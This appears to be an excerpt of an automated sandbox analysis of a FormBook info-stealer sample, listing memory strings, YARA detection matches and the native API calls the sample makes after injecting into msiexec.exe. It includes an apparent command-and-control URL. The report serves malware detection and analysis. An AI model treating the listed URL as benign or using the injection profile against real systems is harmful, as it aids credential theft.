          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krcom
          Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krn-u
          Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 00000009.00000002.912045913.00000000049E2000.00000004.00000001.sdmpString found in binary or memory: https://mollysmulligan.com/8u3b/?DzrXY=Q16
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004181B0 NtCreateFile,3_2_004181B0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418260 NtReadFile,3_2_00418260
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004182E0 NtClose,3_2_004182E0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418390 NtAllocateVirtualMemory,3_2_00418390
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00418392 NtAllocateVirtualMemory,3_2_00418392
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk,3_2_019C99A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C95D0 NtClose,LdrInitializeThunk,3_2_019C95D0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_019C9910
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9540 NtReadFile,LdrInitializeThunk,3_2_019C9540
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C98F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_019C98F0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9840 NtDelayExecution,LdrInitializeThunk,3_2_019C9840
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9860 NtQuerySystemInformation,LdrInitializeThunk,3_2_019C9860
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk,3_2_019C9780
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019C97A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9FE0 NtCreateMutant,LdrInitializeThunk,3_2_019C9FE0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9710 NtQueryInformationToken,LdrInitializeThunk,3_2_019C9710
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C96E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019C96E0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_019C9A00
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk,3_2_019C9A20
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk,3_2_019C9A50
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_019C9660
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C99D0 NtCreateProcessEx,3_2_019C99D0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C95F0 NtQueryInformationFile,3_2_019C95F0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CAD30 NtSetContextThread,3_2_019CAD30
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9520 NtWaitForSingleObject,3_2_019C9520
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9950 NtQueueApcThread,3_2_019C9950
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9560 NtWriteFile,3_2_019C9560
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C98A0 NtWriteVirtualMemory,3_2_019C98A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9820 NtEnumerateKey,3_2_019C9820
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CB040 NtSuspendThread,3_2_019CB040
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA3B0 NtGetContextThread,3_2_019CA3B0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA710 NtOpenProcessToken,3_2_019CA710
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9B00 NtSetValueKey,3_2_019C9B00
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9730 NtQueryVirtualMemory,3_2_019C9730
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9770 NtSetInformationFile,3_2_019C9770
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019CA770 NtOpenThread,3_2_019CA770
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9760 NtOpenProcess,3_2_019C9760
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A80 NtOpenDirectoryObject,3_2_019C9A80
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C96D0 NtCreateKey,3_2_019C96D0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9610 NtEnumerateValueKey,3_2_019C9610
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9A10 NtQuerySection,3_2_019C9A10
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9650 NtQueryValueKey,3_2_019C9650
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019C9670 NtQueryInformationProcess,3_2_019C9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_00EC9860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9840 NtDelayExecution,LdrInitializeThunk,9_2_00EC9840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC95D0 NtClose,LdrInitializeThunk,9_2_00EC95D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC99A0 NtCreateSection,LdrInitializeThunk,9_2_00EC99A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9540 NtReadFile,LdrInitializeThunk,9_2_00EC9540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_00EC9910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_00EC96E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC96D0 NtCreateKey,LdrInitializeThunk,9_2_00EC96D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_00EC9660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9650 NtQueryValueKey,LdrInitializeThunk,9_2_00EC9650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A50 NtCreateFile,LdrInitializeThunk,9_2_00EC9A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9FE0 NtCreateMutant,LdrInitializeThunk,9_2_00EC9FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9780 NtMapViewOfSection,LdrInitializeThunk,9_2_00EC9780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9710 NtQueryInformationToken,LdrInitializeThunk,9_2_00EC9710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC98F0 NtReadVirtualMemory,9_2_00EC98F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC98A0 NtWriteVirtualMemory,9_2_00EC98A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECB040 NtSuspendThread,9_2_00ECB040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9820 NtEnumerateKey,9_2_00EC9820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC95F0 NtQueryInformationFile,9_2_00EC95F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC99D0 NtCreateProcessEx,9_2_00EC99D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9560 NtWriteFile,9_2_00EC9560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9950 NtQueueApcThread,9_2_00EC9950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9520 NtWaitForSingleObject,9_2_00EC9520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECAD30 NtSetContextThread,9_2_00ECAD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A80 NtOpenDirectoryObject,9_2_00EC9A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9670 NtQueryInformationProcess,9_2_00EC9670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A20 NtResumeThread,9_2_00EC9A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A00 NtProtectVirtualMemory,9_2_00EC9A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9610 NtEnumerateValueKey,9_2_00EC9610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9A10 NtQuerySection,9_2_00EC9A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC97A0 NtUnmapViewOfSection,9_2_00EC97A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA3B0 NtGetContextThread,9_2_00ECA3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9760 NtOpenProcess,9_2_00EC9760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9770 NtSetInformationFile,9_2_00EC9770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA770 NtOpenThread,9_2_00ECA770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9730 NtQueryVirtualMemory,9_2_00EC9730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EC9B00 NtSetValueKey,9_2_00EC9B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00ECA710 NtOpenProcessToken,9_2_00ECA710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E81B0 NtCreateFile,9_2_001E81B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8260 NtReadFile,9_2_001E8260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E82E0 NtClose,9_2_001E82E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8390 NtAllocateVirtualMemory,9_2_001E8390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E8392 NtAllocateVirtualMemory,9_2_001E8392
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CAB2641_2_00CAB264
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CAC2B01_2_00CAC2B0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CA99901_2_00CA9990
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_00CADF711_2_00CADF71
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F77B3C1_2_04F77B3C
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7A2D61_2_04F7A2D6
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B9443_2_0041B944
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041BB843_2_0041BB84
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00408C4B3_2_00408C4B
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00408C503_2_00408C50
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041BCF53_2_0041BCF5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041C5ED3_2_0041C5ED
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B70F3_2_0041B70F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B25813_2_019B2581
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A525DD3_2_01A525DD
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199D5E03_2_0199D5E0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0198F9003_2_0198F900
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52D073_2_01A52D07
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01980D203_2_01980D20
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A41203_2_019A4120
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A51D553_2_01A51D55
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199B0903_2_0199B090
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A520A83_2_01A520A8
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019B20A03_2_019B20A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A528EC3_2_01A528EC
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0199841F3_2_0199841F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A410023_2_01A41002
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019BEBB03_2_019BEBB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A51FF13_2_01A51FF1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A4DBD23_2_01A4DBD2
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52B283_2_01A52B28
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A522AE3_2_01A522AE
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_01A52EF73_2_01A52EF7
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019A6E303_2_019A6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F528EC9_2_00F528EC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB20A09_2_00EB20A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F520A89_2_00F520A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9B0909_2_00E9B090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4D4669_2_00F4D466
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F410029_2_00F41002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9841F9_2_00E9841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E9D5E09_2_00E9D5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F525DD9_2_00F525DD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EB25819_2_00EB2581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F51D559_2_00F51D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E80D209_2_00E80D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA41209_2_00EA4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00E8F9009_2_00E8F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52D079_2_00F52D07
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52EF79_2_00F52EF7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F522AE9_2_00F522AE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EA6E309_2_00EA6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F51FF19_2_00F51FF1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F4DBD29_2_00F4DBD2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EBEBB09_2_00EBEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00F52B289_2_00F52B28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB9449_2_001EB944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EBB849_2_001EBB84
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D8C509_2_001D8C50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D8C4B9_2_001D8C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EBCF59_2_001EBCF5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D2D909_2_001D2D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EC5ED9_2_001EC5ED
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001D2FB09_2_001D2FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: String function: 0198B150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00E8B150 appears 35 times
          Source: g1EhgmCqCD.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000000.643686589.00000000005B2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.673721469.00000000072E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672157538.0000000005AB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIEFRAME.DLLD vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672229683.0000000005B30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.675343588.0000000008E80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000000.665930767.0000000000E62000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.736288628.000000000379F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.728784074.0000000001A7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exeBinary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: g1EhgmCqCD.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
